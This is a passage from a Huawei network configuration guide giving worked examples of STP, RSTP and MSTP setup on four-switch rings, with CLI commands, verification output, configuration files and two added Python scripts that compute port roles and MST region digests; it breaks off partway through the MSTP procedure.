loopback-detect enable
loopback-detect action block
#
return


7 Typical Examples of MSTP/RRPP/SEP/VBST

About This Chapter

7.1 Example for Configuring STP
7.2 Example for Configuring RSTP
7.3 Example for Configuring MSTP
7.4 Example for Configuring MSTP and VRRP
7.5 Example for Configuring a Single RRPP Ring with a Single Instance
7.6 Example for Configuring Tangent RRPP Rings
7.7 Example for Configuring RRPP Snooping on a VPLS Network
7.8 Example for Configuring SEP and MSTP on a Network
7.9 Example for Configuring SEP and RRPP on a Network
7.10 Example for Configuring VBST


7.1 Example for Configuring STP


STP Overview
Generally, redundant links are used on an Ethernet switching network to provide link backup
and enhance network reliability. The use of redundant links, however, may produce loops,
causing broadcast storms and rendering the MAC address table unstable. As a result, the
communication quality deteriorates, and communication services may even be interrupted.
The Spanning Tree Protocol (STP) is used to solve these problems. STP prevents loops.
Devices running STP discover loops on the network by exchanging information with each
other, and block some ports to eliminate loops.

STP refers to STP defined in IEEE 802.1D, the Rapid Spanning Tree Protocol (RSTP) defined
in IEEE 802.1W, and the Multiple Spanning Tree Protocol (MSTP) defined in IEEE 802.1S.

MSTP is compatible with RSTP and STP, and RSTP is compatible with STP. Table 7-1
compares STP, RSTP, and MSTP.

Table 7-1 Comparisons among STP, RSTP, and MSTP

Spanning Tree Protocol: STP
Characteristics:
l Forms a loop-free tree to prevent broadcast storms and implement redundancy.
l Provides slow convergence.
Application Scenario: User or service traffic does not need to be differentiated, and all VLANs share a spanning tree.

Spanning Tree Protocol: RSTP
Characteristics:
l Forms a loop-free tree to prevent broadcast storms and implement redundancy.
l Provides fast convergence.
Application Scenario: Same as STP (the STP and RSTP rows share this cell).

Spanning Tree Protocol: MSTP
Characteristics:
l Forms multiple loop-free trees to prevent broadcast storms and implement redundancy.
l Provides fast convergence.
l Implements load balancing among VLANs and forwards traffic in different VLANs along different paths.
Application Scenario: User or service traffic needs to be differentiated and load balanced. Traffic from different VLANs is forwarded through different spanning trees that are independent of each other.

Configuration Notes
l This example applies to all versions and products.
l The ports connected to terminals do not participate in STP calculation, so you are
advised to configure the ports as edge ports or disable STP on the ports.


Networking Requirements
To implement redundancy on a complex network, network designers tend to deploy multiple
physical links between two devices, one of which is the primary link and the others are
backup links. Loops may occur, causing broadcast storms or MAC address entry damage.

After a network designer deploys a network, STP can be deployed on the network to prevent
loops. When loops exist on a network, STP blocks a port to eliminate the loops. As shown in
Figure 7-1, SwitchA, SwitchB, SwitchC, and SwitchD running STP exchange STP BPDUs to
discover loops on the network and block ports to prune the network into a loop-free tree
network. STP prevents infinite looping of packets to ensure packet processing capabilities of
switches.

Figure 7-1 STP networking
[Figure: SwitchA (root bridge) and SwitchD each connect to the upstream network through GE1/0/3 and to each other through GE1/0/1. SwitchA GE1/0/2 connects to SwitchB GE1/0/3, SwitchD GE1/0/2 connects to SwitchC GE1/0/3, and SwitchB GE1/0/1 connects to SwitchC GE1/0/1, the port that STP blocks. PC2 connects to SwitchB GE1/0/2 and PC1 to SwitchC GE1/0/2.]

Configuration Roadmap
Configure basic STP functions on switching devices of the ring network.
1. Configure the switching devices on the ring network to work in STP mode.
2. Configure the root bridge and secondary root bridge.
3. Configure the path cost of a port so that the port can be blocked.
4. Enable STP to eliminate loops.

Procedure
Step 1 Configure basic STP functions.
1. Configure the switching devices on the ring network to work in STP mode.
# Configure SwitchA to work in STP mode.


<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] stp mode stp

# Configure SwitchB to work in STP mode.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] stp mode stp

# Configure SwitchC to work in STP mode.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] stp mode stp

# Configure SwitchD to work in STP mode.
<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] stp mode stp

2. Configure the root bridge and secondary root bridge.
# Configure SwitchA as the root bridge.
[SwitchA] stp root primary

# Configure SwitchD as the secondary root bridge.
[SwitchD] stp root secondary

3. Configure the path cost of a port so that the port can be blocked.
NOTE
– The path cost range depends on the algorithm. The Huawei proprietary algorithm is used as an
example. Set the path costs of the ports to be blocked to 20000.
– Switching devices on the same network must use the same algorithm to calculate the path cost
of ports.
# Configure SwitchA to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchA] stp pathcost-standard legacy

# Configure SwitchB to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchB] stp pathcost-standard legacy

# Configure SwitchC to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchC] stp pathcost-standard legacy

# Set the path cost of GigabitEthernet1/0/1 on SwitchC to 20000.
[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] stp cost 20000
[SwitchC-GigabitEthernet1/0/1] quit

# Configure SwitchD to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchD] stp pathcost-standard legacy

4. Enable STP to eliminate loops.
– Configure the ports connected to PCs as edge ports and BPDU filter ports.
# Configure GigabitEthernet1/0/2 of SwitchB as an edge port and BPDU filter port.
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] stp edged-port enable
[SwitchB-GigabitEthernet1/0/2] stp bpdu-filter enable
[SwitchB-GigabitEthernet1/0/2] quit

# Configure GigabitEthernet1/0/2 of SwitchC as an edge port and BPDU filter port.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] stp edged-port enable
[SwitchC-GigabitEthernet1/0/2] stp bpdu-filter enable
[SwitchC-GigabitEthernet1/0/2] quit


– Enable STP globally on devices.
# Enable STP globally on SwitchA.
[SwitchA] stp enable

# Enable STP globally on SwitchB.
[SwitchB] stp enable

# Enable STP globally on SwitchC.
[SwitchC] stp enable

# Enable STP globally on SwitchD.
[SwitchD] stp enable

Step 2 Verify the configuration.
After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.
# Run the display stp brief command on SwitchA to view the port status and protection type.
The displayed information is as follows:
[SwitchA] display stp brief
MSTID  Port                  Role  STP State   Protection
0      GigabitEthernet1/0/1  DESI  FORWARDING  NONE
0      GigabitEthernet1/0/2  DESI  FORWARDING  NONE

After SwitchA is configured as the root bridge, GigabitEthernet1/0/2 and GigabitEthernet1/0/1,
connected to SwitchB and SwitchD respectively, are selected as designated ports.
# Run the display stp interface gigabitethernet 1/0/1 brief command on SwitchB to check
the status of GigabitEthernet1/0/1. The following information is displayed:
[SwitchB] display stp interface gigabitethernet 1/0/1 brief
MSTID  Port                  Role  STP State   Protection
0      GigabitEthernet1/0/1  DESI  FORWARDING  NONE

GigabitEthernet1/0/1 becomes the designated port and is in FORWARDING state.

# Run the display stp brief command on SwitchC to check the port status.
[SwitchC] display stp brief
MSTID  Port                  Role  STP State   Protection
0      GigabitEthernet1/0/1  ALTE  DISCARDING  NONE
0      GigabitEthernet1/0/3  ROOT  FORWARDING  NONE

GigabitEthernet1/0/3 becomes the root port and is in FORWARDING state.
GigabitEthernet1/0/1 becomes the alternate port and is in DISCARDING state.

----End
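The port roles shown in the verification step above follow from the root election and from each bridge's root path cost, which is why raising the cost of SwitchC GE1/0/1 to 20000 makes that port the one STP blocks. The following Python is an added example, not code from this document or from Huawei, that works the roles out for the topology of Figure 7-1; it assumes constructed bridge MAC addresses as tie-breakers and a legacy path cost of 20 for a GE port, with only SwitchC GE1/0/1 carrying the 20000 configured in Step 1.

```python
"""Work out the STP port roles shown in the verification step for the ring in
Figure 7-1.  Added example, not code from the Huawei document: the bridge MAC
addresses are constructed and the legacy path cost of 20 for a GE port is assumed."""
import heapq
from typing import Dict, List, Tuple

BridgeId = Tuple[int, str]  # (priority, MAC); the lower value wins, as in STP

# Bridge IDs: `stp root primary` / `stp root secondary` lower the priority of SwitchA
# and SwitchD; SwitchB and SwitchC keep the default 32768.  MACs are placeholders.
BRIDGES: Dict[str, BridgeId] = {
    "SwitchA": (0, "00e0-fc00-000a"),
    "SwitchB": (32768, "00e0-fc00-000b"),
    "SwitchC": (32768, "00e0-fc00-000c"),
    "SwitchD": (4096, "00e0-fc00-000d"),
}

GE = 20  # assumed Huawei legacy path cost of a GE port

# Links read from Figure 7-1: ((bridge, port, port cost), (bridge, port, port cost)).
# Only SwitchC GE1/0/1 carries the `stp cost 20000` configured in the procedure.
LINKS = [
    (("SwitchA", "GigabitEthernet1/0/1", GE), ("SwitchD", "GigabitEthernet1/0/1", GE)),
    (("SwitchA", "GigabitEthernet1/0/2", GE), ("SwitchB", "GigabitEthernet1/0/3", GE)),
    (("SwitchD", "GigabitEthernet1/0/2", GE), ("SwitchC", "GigabitEthernet1/0/3", GE)),
    (("SwitchB", "GigabitEthernet1/0/1", GE), ("SwitchC", "GigabitEthernet1/0/1", 20000)),
]


def elect_root(bridges: Dict[str, BridgeId]) -> str:
    """The bridge with the lowest (priority, MAC) becomes the root bridge."""
    return min(bridges, key=lambda b: bridges[b])


def compute_port_roles(bridges, links) -> Dict[Tuple[str, str], str]:
    """Return {(bridge, port): role} with role in ROOT, DESI or ALTE."""
    root = elect_root(bridges)
    # adjacency: bridge -> [(neighbour, neighbour's port, cost of that port)]
    adj: Dict[str, List[Tuple[str, str, int]]] = {b: [] for b in bridges}
    for (b1, p1, c1), (b2, p2, c2) in links:
        adj[b1].append((b2, p2, c2))
        adj[b2].append((b1, p1, c1))
    # Dijkstra keyed on (root path cost, sender bridge ID).  A bridge's root path cost
    # is the neighbour's root path cost plus the cost of the port the BPDU arrives on,
    # so the 20000 on SwitchC GE1/0/1 only penalises the path entering SwitchC there.
    best: Dict[str, Tuple[int, BridgeId, str]] = {root: (0, bridges[root], "")}
    heap = [(0, bridges[root], root)]
    settled = set()
    while heap:
        cost, _sender, b = heapq.heappop(heap)
        if b in settled:
            continue
        settled.add(b)
        for nb, nb_port, nb_cost in adj[b]:
            cand = (cost + nb_cost, bridges[b])
            if nb not in best or cand < best[nb][:2]:
                best[nb] = (cand[0], cand[1], nb_port)  # nb_port becomes nb's root port
                heapq.heappush(heap, (cand[0], cand[1], nb))
    roles: Dict[Tuple[str, str], str] = {}
    for (b1, p1, _), (b2, p2, _) in links:
        # on each link the end with the lower (root path cost, bridge ID) is designated
        desig = b1 if (best[b1][0], bridges[b1]) < (best[b2][0], bridges[b2]) else b2
        for b, p in ((b1, p1), (b2, p2)):
            if b == desig:
                roles[(b, p)] = "DESI"
            elif best[b][2] == p:
                roles[(b, p)] = "ROOT"
            else:
                roles[(b, p)] = "ALTE"  # the port STP blocks
    return roles


def stp_state(role: str) -> str:
    """Stable-state column of `display stp brief` for a given role."""
    return "FORWARDING" if role in ("ROOT", "DESI") else "DISCARDING"


def blocked_ports(roles: Dict[Tuple[str, str], str]) -> List[Tuple[str, str]]:
    return sorted(p for p, r in roles.items() if r == "ALTE")


if __name__ == "__main__":
    computed = compute_port_roles(BRIDGES, LINKS)
    for (bridge, port), role in sorted(computed.items()):
        print(f"{bridge:8} {port:22} {role:5} {stp_state(role)}")
```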

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
stp mode stp
stp instance 0 root primary
stp pathcost-standard legacy
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
stp mode stp
stp pathcost-standard legacy
#
interface GigabitEthernet1/0/2
stp bpdu-filter enable
stp edged-port enable
#
return

l Configuration file of SwitchC
#
sysname SwitchC
#
stp mode stp
stp pathcost-standard legacy
#
interface GigabitEthernet1/0/1
stp instance 0 cost 20000
#
interface GigabitEthernet1/0/2
stp bpdu-filter enable
stp edged-port enable
#
return

l Configuration file of SwitchD


#
sysname SwitchD
#
stp mode stp
stp instance 0 root secondary
stp pathcost-standard legacy
#
return

Related Content
Videos
Configuring STP to Prevent Loops

7.2 Example for Configuring RSTP

RSTP Overview
Generally, redundant links are used on an Ethernet switching network to provide link backup
and enhance network reliability. The use of redundant links, however, may produce loops,
causing broadcast storms and rendering the MAC address table unstable. As a result, the
communication quality deteriorates, and communication services may even be interrupted.
The Spanning Tree Protocol (STP) is used to solve these problems. STP prevents loops.
Devices running STP discover loops on the network by exchanging information with each
other, and block some ports to eliminate loops.
STP refers to STP defined in IEEE 802.1D, the Rapid Spanning Tree Protocol (RSTP) defined
in IEEE 802.1W, and the Multiple Spanning Tree Protocol (MSTP) defined in IEEE 802.1S.

MSTP is compatible with RSTP and STP, and RSTP is compatible with STP. Table 7-2
compares STP, RSTP, and MSTP.

Table 7-2 Comparisons among STP, RSTP, and MSTP

Spanning Tree Protocol | Characteristics | Application Scenario
STP | l Forms a loop-free tree to prevent broadcast storms and implement redundancy. l Provides slow convergence. | User or service traffic does not need to be differentiated, and all VLANs share a spanning tree.
RSTP | l Forms a loop-free tree to prevent broadcast storms and implement redundancy. l Provides fast convergence. | User or service traffic does not need to be differentiated, and all VLANs share a spanning tree (same scenario as STP).
MSTP | l Forms multiple loop-free trees to prevent broadcast storms and implement redundancy. l Provides fast convergence. l Implements load balancing among VLANs and forwards traffic in different VLANs along different paths. | User or service traffic needs to be differentiated and load balanced. Traffic from different VLANs is forwarded through different spanning trees that are independent of each other.

Configuration Notes
l This example applies to all versions and products.
l The ports connected to terminals do not participate in RSTP calculation, so you are
advised to configure the ports as edge ports or disable STP on the ports.

Networking Requirements
To implement redundancy on a complex network, network designers tend to deploy multiple
physical links between two devices, one of which is the primary link and the others are
backup links. Loops may occur, causing broadcast storms or MAC address entry damage.
After a network designer deploys a network, RSTP can be deployed on the network to prevent
loops. When loops exist on a network, RSTP blocks a port to eliminate the loops. As shown in
Figure 7-2, SwitchA, SwitchB, SwitchC, and SwitchD running RSTP exchange RSTP
BPDUs to discover loops on the network and block ports to prune the network into a loop-free
tree network. RSTP prevents infinite looping of packets to ensure packet processing
capabilities of switches.

Figure 7-2 RSTP networking

[Figure: SwitchA (root bridge) and SwitchD connect to the upstream network through GE1/0/3 and to each other through GE1/0/1. SwitchA GE1/0/2 connects to SwitchB GE1/0/3, SwitchD GE1/0/2 connects to SwitchC GE1/0/3, and SwitchB GE1/0/1 connects to SwitchC GE1/0/1, so the four switches form an RSTP ring. PC1 connects to GE1/0/2 of SwitchC and PC2 to GE1/0/2 of SwitchB. The blocked port is GE1/0/1 of SwitchC.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure basic RSTP functions on switching devices of the ring network.
a. Configure the switching devices on the ring network to work in RSTP mode.
b. Configure the root bridge and secondary root bridge.
c. Configure the path cost of a port so that the port can be blocked.
d. Enable RSTP to eliminate loops.
2. Enable protection functions to protect devices or links. For example, enable root
protection on the designated port of the root bridge.

Procedure
Step 1 Configure basic RSTP functions.
1. Configure the switching devices on the ring network to work in RSTP mode.
# Configure SwitchA to work in RSTP mode.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] stp mode rstp

# Configure SwitchB to work in RSTP mode.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] stp mode rstp

# Configure SwitchC to work in RSTP mode.


<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] stp mode rstp

# Configure SwitchD to work in RSTP mode.


<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] stp mode rstp

2. Configure the root bridge and secondary root bridge.


# Configure SwitchA as the root bridge.
[SwitchA] stp root primary

# Configure SwitchD as the secondary root bridge.


[SwitchD] stp root secondary

3. Configure the path cost of a port so that the port can be blocked.
NOTE

– The path cost range depends on the algorithm. Huawei proprietary algorithm is used as an
example. Set the path costs of the ports to be blocked to 20000.
– Switching devices on the same network must use the same algorithm to calculate the path cost
of ports.
# Configure SwitchA to use Huawei proprietary algorithm to calculate the path cost.
[SwitchA] stp pathcost-standard legacy

# Configure SwitchB to use Huawei proprietary algorithm to calculate the path cost.
[SwitchB] stp pathcost-standard legacy

# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost.
[SwitchC] stp pathcost-standard legacy

# Set the path cost of GigabitEthernet1/0/1 on SwitchC to 20000.


[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] stp cost 20000
[SwitchC-GigabitEthernet1/0/1] quit

# Configure SwitchD to use Huawei proprietary algorithm to calculate the path cost.
[SwitchD] stp pathcost-standard legacy

4. Enable RSTP to eliminate loops.


– Configure the ports connected to PCs as edge ports and configure BPDU filtering.
# Configure GigabitEthernet1/0/2 on SwitchB as an edge port and configure BPDU
filtering.
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] stp edged-port enable
[SwitchB-GigabitEthernet1/0/2] stp bpdu-filter enable
[SwitchB-GigabitEthernet1/0/2] quit

# Configure GigabitEthernet1/0/2 on SwitchC as an edge port and configure BPDU


filtering.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] stp edged-port enable
[SwitchC-GigabitEthernet1/0/2] stp bpdu-filter enable
[SwitchC-GigabitEthernet1/0/2] quit

– Enable RSTP globally on devices.


# Enable RSTP on SwitchA.
[SwitchA] stp enable

# Enable RSTP globally on SwitchB.


[SwitchB] stp enable

# Enable RSTP globally on SwitchC.


[SwitchC] stp enable

# Enable RSTP globally on SwitchD.


[SwitchD] stp enable

Step 2 Enable protection functions. Here, root protection is used on the designated port of the root
bridge.
# Configure root protection on GigabitEthernet1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] stp root-protection
[SwitchA-GigabitEthernet1/0/1] quit

# Configure root protection on GigabitEthernet1/0/2 of SwitchA.


[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] stp root-protection
[SwitchA-GigabitEthernet1/0/2] quit

Step 3 Verify the configuration.


After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.
# Run the display stp brief command on SwitchA to view the status and protection type on
the ports. The displayed information is as follows:
[SwitchA] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
0 GigabitEthernet1/0/2 DESI FORWARDING ROOT

After SwitchA is configured as the root bridge, GigabitEthernet1/0/2 and
GigabitEthernet1/0/1, which connect to SwitchB and SwitchD, become designated ports and
are configured with root protection.
# Run the display stp interface gigabitethernet 1/0/1 brief command on SwitchB to check
the status of GigabitEthernet1/0/1. The following information is displayed:
[SwitchB] display stp interface gigabitethernet 1/0/1 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING NONE

GigabitEthernet1/0/1 becomes the designated port and is in FORWARDING state.


# Run the display stp brief command on SwitchC to check the port status.
[SwitchC] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 ALTE DISCARDING NONE
0 GigabitEthernet1/0/2 DESI FORWARDING NONE
0 GigabitEthernet1/0/3 ROOT FORWARDING NONE

GE1/0/1 becomes the alternate port and is in DISCARDING state.


GE1/0/3 becomes the root port and is in FORWARDING state.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
stp mode rstp
stp instance 0 root primary
stp pathcost-standard legacy
#
interface GigabitEthernet1/0/1
stp root-protection
#
interface GigabitEthernet1/0/2
stp root-protection
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
stp mode rstp
stp pathcost-standard legacy
#
interface GigabitEthernet1/0/2
stp bpdu-filter enable
stp edged-port enable
#
return

l Configuration file of SwitchC


#
sysname SwitchC
#
stp mode rstp
stp pathcost-standard legacy
#
interface GigabitEthernet1/0/1
stp instance 0 cost 20000
#
interface GigabitEthernet1/0/2
stp bpdu-filter enable
stp edged-port enable
#
return

l Configuration file of SwitchD


#
sysname SwitchD
#
stp mode rstp
stp instance 0 root secondary
stp pathcost-standard legacy
#
return

Related Content
Videos
Configuring STP to Prevent Loops

7.3 Example for Configuring MSTP


MSTP Overview
Generally, redundant links are used on an Ethernet switching network to provide link backup
and enhance network reliability. The use of redundant links, however, may produce loops,
causing broadcast storms and rendering the MAC address table unstable. As a result, the
communication quality deteriorates, and communication services may even be interrupted.

The Spanning Tree Protocol (STP) is used to solve these problems. STP prevents loops.
Devices running STP discover loops on the network by exchanging information with each
other, and block some ports to eliminate loops.

STP refers to STP defined in IEEE 802.1D, the Rapid Spanning Tree Protocol (RSTP) defined
in IEEE 802.1W, and the Multiple Spanning Tree Protocol (MSTP) defined in IEEE 802.1S.

MSTP is compatible with RSTP and STP, and RSTP is compatible with STP. Table 7-3
compares STP, RSTP, and MSTP.

Table 7-3 Comparisons among STP, RSTP, and MSTP

Spanning Tree Protocol | Characteristics | Application Scenario
STP | l Forms a loop-free tree to prevent broadcast storms and implement redundancy. l Provides slow convergence. | User or service traffic does not need to be differentiated, and all VLANs share a spanning tree.
RSTP | l Forms a loop-free tree to prevent broadcast storms and implement redundancy. l Provides fast convergence. | User or service traffic does not need to be differentiated, and all VLANs share a spanning tree (same scenario as STP).
MSTP | l Forms multiple loop-free trees to prevent broadcast storms and implement redundancy. l Provides fast convergence. l Implements load balancing among VLANs and forwards traffic in different VLANs along different paths. | User or service traffic needs to be differentiated and load balanced. Traffic from different VLANs is forwarded through different spanning trees that are independent of each other.

Configuration Notes
l This example applies to all versions and products.
l The ports connected to terminals do not participate in MSTP calculation, so you are
advised to configure the ports as edge ports or disable STP on the ports.

Networking Requirements
To implement redundancy on a complex network, network designers tend to deploy multiple
physical links between two devices, one of which is the primary link and the others are
backup links. Loops may occur, causing broadcast storms or MAC address entry damage.
MSTP can be used to prevent loops. MSTP blocks redundant links and prunes a network into
a tree topology free from loops.

As shown in Figure 7-3, SwitchA, SwitchB, SwitchC, and SwitchD run MSTP. MSTP uses
multiple instances to implement load balancing of traffic in VLANs 2 to 10 and VLANs 11 to
20. A VLAN mapping table defines the mapping between VLANs and MSTIs.

Figure 7-3 MSTP networking

[Figure: MST region RG1. SwitchA and SwitchB connect to the upstream network and to each other through Eth-Trunk1. SwitchA GE1/0/1 connects to SwitchC GE1/0/3, SwitchB GE1/0/1 connects to SwitchD GE1/0/3, and SwitchC GE1/0/2 connects to SwitchD GE1/0/2. GE1/0/1 on SwitchC and on SwitchD connects to a terminal. VLANs 2 to 10 map to MSTI 1 (root switch: SwitchA); VLANs 11 to 20 map to MSTI 2 (root switch: SwitchB). Each MSTI has one blocked port.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic MSTP functions on switching devices of the ring network.

2. Enable protection functions to protect devices or links. For example, enable root
protection on the designated port of the root bridge in each MSTI.
NOTE

When the link between the root bridge and secondary root bridge goes Down, the port enabled with root
protection becomes Discarding because root protection takes effect.
To improve the reliability, you are advised to bind the link between the root bridge and secondary root
bridge to an Eth-Trunk.
3. Configure Layer 2 forwarding on devices.

Procedure
Step 1 Configure basic MSTP functions.
1. Configure SwitchA, SwitchB, SwitchC, and SwitchD (access switches) in the MST
region RG1 and create MSTI 1 and MSTI 2.
NOTE

Two switches belong to the same MST region when they have the same:
– Name of the MST region
– Mapping between VLANs and MSTIs
– Revision level of the MST region
# Configure an MST region of root bridge SwitchA in MSTI 1.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] stp region-configuration
[SwitchA-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchA-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchA-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchA-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchA-mst-region] quit

# Configure an MST region of SwitchB.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] stp region-configuration
[SwitchB-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchB-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchB-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchB-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchB-mst-region] quit

# Configure an MST region of SwitchC.


<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] stp region-configuration
[SwitchC-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchC-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchC-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchC-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchC-mst-region] quit

# Configure an MST region of SwitchD.


<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] stp region-configuration
[SwitchD-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchD-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchD-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchD-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchD-mst-region] quit
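The NOTE above lists the three parameters that must match before switches share an MST region. The following Python script, added here as an illustration and not part of the Huawei documentation or VRP software, computes the region digest that IEEE 802.1s derives from the VLAN-to-MSTI mapping and carries in MST BPDUs, then compares two intended region configurations before they are activated. The parser for the VRP `instance N vlan` argument, the RG1 values, and the mistyped second configuration are constructed for the example; the HMAC-MD5 key is the constant from the standard.

```python
"""MST region digest check (added example, not Huawei code).

IEEE 802.1s identifies a region by its name, revision level and VLAN-to-MSTI
mapping; the mapping is carried in MST BPDUs as an HMAC-MD5 digest over the
4096-entry VLAN table, keyed with a constant fixed by the standard. Switches
whose digests differ never join the same region, so computing the digest from
the intended 'instance N vlan ...' lines is a quick consistency check before
'active region-configuration' is run on each switch.
"""
import hashlib
import hmac

# Signature key defined in IEEE 802.1s for the MST configuration digest.
MST_DIGEST_KEY = bytes.fromhex("13AC06A62E47FD51F95D2BA243CD0346")


def parse_vlan_list(spec):
    """Parse the VRP 'instance N vlan' argument, e.g. '2 to 10 12' -> [2..10, 12]."""
    tokens, vlans, i = spec.split(), [], 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.extend(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.append(int(tokens[i]))
            i += 1
    return vlans


def msti_table(instance_map):
    """Build the 4096-entry table VLAN -> MSTI; unmapped VLANs stay in MSTI 0 (CIST)."""
    table = [0] * 4096
    for msti, spec in instance_map.items():
        for vlan in parse_vlan_list(spec):
            if not 1 <= vlan <= 4094:
                raise ValueError(f"VLAN {vlan} out of range")
            table[vlan] = msti
    return table


def region_digest(instance_map):
    """HMAC-MD5 over the table encoded as 4096 big-endian 16-bit MSTIDs (hex, upper case)."""
    data = b"".join(msti.to_bytes(2, "big") for msti in msti_table(instance_map))
    return hmac.new(MST_DIGEST_KEY, data, hashlib.md5).hexdigest().upper()


def same_region(a, b):
    """True when both switches would join one region: name, revision and digest match."""
    key = lambda r: (r["name"], r["revision"], region_digest(r["instances"]))
    return key(a) == key(b)


# Constructed from section 7.3: region RG1, VLANs 2-10 in MSTI 1, VLANs 11-20 in MSTI 2.
RG1 = {"name": "RG1", "revision": 0, "instances": {1: "2 to 10", 2: "11 to 20"}}
# Constructed mistake on one switch: VLAN 20 typed into MSTI 1 instead of MSTI 2.
RG1_MISTYPED = {"name": "RG1", "revision": 0, "instances": {1: "2 to 10 20", 2: "11 to 19"}}

if __name__ == "__main__":
    print("default mapping (all VLANs in the CIST):", region_digest({}))
    print("RG1 digest:", region_digest(RG1["instances"]))
    print("same region as RG1_MISTYPED:", same_region(RG1, RG1_MISTYPED))
```

A single VLAN placed in the wrong instance on one switch changes that switch's digest, so it forms a region of its own and the ring is then calculated as two regions joined through the CIST, which is not the load-balanced topology the example intends; comparing digests before activation catches that on the desk rather than on the network.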

2. Configure root bridges and secondary root bridges of MSTI 1 and MSTI 2 in the MST
region RG1.
– Configure the root bridge and secondary root bridge in MSTI 1.
# Configure SwitchA as the root bridge in MSTI 1.
[SwitchA] stp instance 1 root primary

# Configure SwitchB as the secondary root bridge in MSTI 1.


[SwitchB] stp instance 1 root secondary

– Configure the root bridge and secondary root bridge in MSTI 2.


# Configure SwitchB as the root bridge in MSTI 2.
[SwitchB] stp instance 2 root primary

# Configure SwitchA as the secondary root bridge in MSTI 2.


[SwitchA] stp instance 2 root secondary

3. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to be larger than the
default values.
NOTE

– The path cost range depends on the algorithm. Huawei proprietary algorithm is used as an
example. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to 20000.
– Switching devices on the same network must use the same algorithm to calculate the path cost
of ports.
# Configure SwitchA to use Huawei proprietary algorithm to calculate the path cost.
[SwitchA] stp pathcost-standard legacy

# Configure SwitchB to use Huawei proprietary algorithm to calculate the path cost.
[SwitchB] stp pathcost-standard legacy

# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost and
set the path cost of GE1/0/2 to 20000 in MSTI 2.
[SwitchC] stp pathcost-standard legacy
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] stp instance 2 cost 20000
[SwitchC-GigabitEthernet1/0/2] quit

# Configure SwitchD to use Huawei proprietary algorithm to calculate the path cost and
set the path cost of GE1/0/2 to 20000 in MSTI 1.
[SwitchD] stp pathcost-standard legacy
[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] stp instance 1 cost 20000
[SwitchD-GigabitEthernet1/0/2] quit

4. Enable MSTP to eliminate loops.


– Enable MSTP globally on devices.
# Enable MSTP on SwitchA.
[SwitchA] stp enable

# Enable MSTP on SwitchB.


[SwitchB] stp enable

# Enable MSTP on SwitchC.


[SwitchC] stp enable

# Enable MSTP on SwitchD.


[SwitchD] stp enable

– Configure the ports connected to the terminal as edge ports and BPDU filter ports.

# Configure GE1/0/1 of SwitchC as an edge port and BPDU filter port.


[SwitchC] interface gigabitethernet 1/0/1
